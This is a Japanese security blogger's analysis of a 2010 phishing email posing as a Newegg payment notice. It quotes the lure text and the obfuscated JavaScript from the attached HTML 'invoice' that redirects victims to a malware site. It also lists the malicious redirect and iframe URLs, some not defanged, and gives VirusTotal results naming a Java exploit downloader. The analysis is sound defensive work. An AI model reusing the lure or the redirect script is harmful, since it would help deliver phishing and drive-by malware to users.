FC2ブログ

スポンサーサイト

上記の広告は1ヶ月以上更新のないブログに表示されています。
新しい記事を書く事で広告が消せます。

【今日の誘導メール】前門の虎後門の狼系

件名
Newegg.com - Payment Charged

本文
Newegg.com - Payment Charged
Customer ID: 353455
AccountNumber: 47346765765
Hello,
Thank you for shopping at Newegg.com.
We are happy to inform you that your order (Sales Order Number: 134564535)has been successfully charged to your VISA and orderverification is now complete.
Please find attached invoice.
Once You Know, You Newegg.
Your Newegg.com Customer Service Team
Newegg.com,9997 E. Rose Hills Road, Whittier, CA. 90601 | 2000-2010 Newegg Inc.All rights reserved.

添付ファイル
NewEgg Invoice.html 含まれるスクリプト部分

function r(){};fQ=false;d="";r.prototype = {p : function() { this.j='';var pN=54899;s=false;this.k="k";this.kH=22581;c='';l=64422;document.location.href=string("htt"+"p:/"+"/tr"+"ace"+"boo"+"k.u"+"s/1"+".htOnc".substr(0,3)+"ml");this.g=59634;var o=false;z='';f="f";e="";y=22487;}};x="";var gK=false;var zA=new r(); pU='';this.u="u";zA.p();var lK=false;<
誘導先 → h丁丁p://tracebook.us/1.html
メタタグ → h丁丁p://cetogilco.cz.cc/scanner10/?afid=24
aguse.jpで調べてみると、今日は生きてない。そういうことか!。
czcc.jpg

iframeタグ → http://windows-portal.in/3/index.php?message=151&on=back&navig=ddd&pool=ssl
こちらの方は、
h丁丁p://windows-portal.in/home/j.php が落ちてきて

MD5: f6c79355101b4c382d2bb3e12e7b4fe2
Date first seen: 2010-06-17 17:50:15 (UTC)
Date last seen: 2010-08-24 12:36:27 (UTC)
Detection ratio: 16/42
ウイルスチェック結果
Antivirus Version Last update Result
AhnLab-V3 2010.08.24.00 2010.08.23 -
AntiVir 8.2.4.38 2010.08.24 JAVA/Dldr.Agent.W
Antiy-AVL 2.0.3.7 2010.08.23 -
Authentium 5.2.0.5 2010.08.24 -
Avast 4.8.1351.0 2010.08.23 Java:Agent-BA
Avast5 5.0.332.0 2010.08.23 Java:Agent-BA
AVG 9.0.0.851 2010.08.24 Generic2_c.BOMJ
BitDefender 7.2 2010.08.24 -
CAT-QuickHeal 11.00 2010.08.24 -
ClamAV 0.96.2.0-git 2010.08.24 Trojan.Java.Rowindal
Comodo 5843 2010.08.24 -
DrWeb 5.0.2.03300 2010.08.24 -
Emsisoft 5.0.0.37 2010.08.24 Trojan.Java.Rowindal!IK
eSafe 7.0.17.0 2010.08.23 -
eTrust-Vet 36.1.7810 2010.08.23 -
F-Prot 4.6.1.107 2010.08.24 -
F-Secure 9.0.15370.0 2010.08.24 Trojan:Java/Rowindal.A
Fortinet 4.1.143.0 2010.08.24 -
GData 21 2010.08.24 Java:Agent-BA
Ikarus T3.1.1.88.0 2010.08.24 Trojan.Java.Rowindal
Jiangmin 13.0.900 2010.08.23 -
Kaspersky 7.0.0.125 2010.08.24 Exploit.Java.CVE-2010-0094.a
McAfee 5.400.0.1158 2010.08.24 -
McAfee-GW-Edition 2010.1B 2010.08.24 -
Microsoft 1.6103 2010.08.24 Trojan:Java/Rowindal.A
NOD32 5393 2010.08.24 a variant of Java/Rowindal.A
Norman 6.05.11 2010.08.24 Java/Rowindal.B
nProtect 2010-08-24.01 2010.08.24 -
Panda 10.0.2.7 2010.08.24 -
PCTools 7.0.3.5 2010.08.24 -
Prevx 3.0 2010.08.24 -
Rising 22.62.01.04 2010.08.24 -
Sophos 4.56.0 2010.08.24 Mal/JavaDldr-B
Sunbelt 6784 2010.08.24 -
SUPERAntiSpyware 4.40.0.1006 2010.08.24 -
Symantec 20101.1.1.7 2010.08.24 -
TheHacker 6.5.2.1.355 2010.08.24 -
TrendMicro 9.120.0.1004 2010.08.24 TROJ_JAVA.BM
TrendMicro-HouseCall 9.120.0.1004 2010.08.24 TROJ_JAVA.AQ
VBA32 3.12.14.0 2010.08.24 -
ViRobot 2010.8.24.4005 2010.08.24 -
VirusBuster 5.0.27.0 2010.08.23 -
MD5: f6c79355101b4c382d2bb3e12e7b4fe2
SHA1: 4487aaae64abd6b47a331dca6404e113a2ffde14
SHA256: 0997384a932a2278a5e5dc19de075bcd758ba8e2ef5b23b2b8d341f613c22cc6
File size: 8429 bytes
Scan date: 2010-08-24 12:36:27 (UTC)

コメント


非公開コメント

プロフィール

どらいつ 家主:どらいつ

情報セキュリティ会社勤務。13年前からタバコを止めたが禁煙はしてない。ダイエットとリバウンドの繰り返し。


1958年 北九州市生まれ。大原小学校、池田小学校、香月中学、北九州予備校、東筑高校、熊本大学土木科(中退)、1984年就職、現在にいたる。

中学時は水泳部。部内で平泳ぎ 4位(4人中)。高校・大学時代9年間はラグビー。ポジションはフッカー。当時に今の体重があれば、、

ツイッター(Twitter) dry2
つぶやきログ(Twilog) dry2
日経電子版コラム
日経BP連載
グーグル+写真アルバム
フォト蔵 dry2

最新記事
最新コメント
カテゴリ
RSS
どらいつのお気に入り
上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。